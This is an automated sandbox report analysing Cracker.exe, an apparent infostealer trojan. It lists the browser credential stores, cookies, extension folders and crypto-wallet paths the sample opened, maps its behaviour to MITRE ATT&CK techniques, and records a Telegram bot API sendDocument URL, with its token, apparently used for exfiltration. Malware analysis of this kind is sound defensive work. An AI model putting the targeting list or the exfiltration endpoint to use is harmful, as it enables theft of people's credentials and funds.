      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\caljgklbbfbcjjanaijlacgncafpegll
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b7e6c706-6d19-4b9e-9c37-e5ee870c2129\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\84b89d2b-fec7-4b59-87f2-603dcfbd43dd\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\881ae04a-fa90-4a62-8eee-5ae000467040\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\b79425d0-2f84-41d2-84d3-9f598259534d\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\af2cf244-1bda-453b-baae-9793e72e9be8\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\697416b8-55c0-41ac-9636-a06aa38f99e9\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\1dcaa933-a69d-41cc-acb5-708980d119e5\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e9edf720-d88f-46ea-8d95-7134a339b3c1\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\cookies.sqlite
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\admmjipmmciaobhojoghlmleefbicajg
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklb
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login Data
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmnded
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
      Source: C:\Users\user\Desktop\Cracker.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\

      Remote Access Functionality

      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      Source: Yara match | File source: Process Memory Space: Cracker.exe PID: 7528, type: MEMORYSTR
      MITRE ATT&CK Matrix (technique cells carry the report's match count in parentheses)

      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (31) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping (1) | Security Software Discovery (21) | Remote Services | Data from Local System (3) | Web Service (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Abuse Elevation Control Mechanism (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (31) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Data from Network Shared Drive | Ingress Tool Transfer (1) | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Process Injection (11) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (3) | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Abuse Elevation Control Mechanism (1) | LSA Secrets | System Network Configuration Discovery (1) | SSH | Keylogging | Application Layer Protocol (4) | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (1) | Cached Domain Credentials | File and Directory Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (1) | DCSync | System Information Discovery (22) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
      Antivirus Detection (Submitted File)

      Source | Detection | Scanner | Label | Link
      Cracker.exe | 39% | ReversingLabs | Win64.Trojan.Barys |
      Cracker.exe | 100% | Joe Sandbox ML | |

      Dropped Files: No Antivirus matches
      Unpacked PE Files: No Antivirus matches
      Domains: No Antivirus matches

      Antivirus Detection (URLs)

      Source | Detection | Scanner | Label | Link
      https://cdn.ipwhois.io/flags/us.svgM | 0% | Avira URL Cloud | safe |
      https://cdn.ipwhois.io/flags/us.svg | 0% | Avira URL Cloud | safe |
      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      ipwho.is | 108.181.61.49 | true | false | | high
      api.telegram.org | 149.154.167.220 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://duckduckgo.com/chrome_newtab | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://duckduckgo.com/ac/?q= | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://api.telegram.org/bot6924568893:AAFJucbuZH8gWTMC3Nv_EZKmmqi4jI-5y04/sendDocument?chat_id=-412 | Cracker.exe, 00000000.00000003.1978384633.0000029794F44000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://www.ecosia.org/newtab/ | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://cdn.ipwhois.io/flags/us.svgM | Cracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Cracker.exe, 00000000.00000003.1895935302.000002979312F000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr | false | | high
https://cdn.ipwhois.io/flags/us.svg | Cracker.exe, 00000000.00000002.1979276829.00000297930A2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
108.181.61.49 | ipwho.is | Canada | | 852 | ASN852CA | false
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1551915
                              Start date and time:2024-11-08 11:42:19 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 36s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
Number of new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Cracker.exe
                              Detection:MAL
                              Classification:mal92.troj.spyw.evad.winEXE@4/14@2/2
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
